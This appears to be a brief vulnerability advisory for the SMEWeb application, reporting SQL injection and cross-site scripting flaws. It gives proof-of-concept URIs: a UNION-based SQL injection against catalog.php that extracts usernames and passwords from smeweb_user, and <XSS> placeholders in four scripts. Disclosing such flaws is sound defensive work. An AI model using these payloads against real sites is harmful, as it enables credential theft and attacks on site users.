SMEWeb SQL Injection and Multiple Cross-Site Scripting Vulnerabilities

SMEWeb SQL Injection and Multiple Cross-Site Scripting Vulnerabilities

An attacker can exploit these issues through a browser. To exploit the cross-site scripting issue, the attacker must entice an unsuspecting user to follow a malicious URI.

The following proof-of-concept URIs are available:

http://www.example.com/catalog.php?idp=1'union select 1,2,password,username,5,6,7,8 from smeweb_user where userid=1 ORDER BY counter/*
http://www.example.com/catalog.php?data=<XSS>
http://www.example.com/search.php?keyword=<XSS>
http://www.example.com/bb.php?page=<XSS>
http://www.example.com/order.php?new_s=<XSS>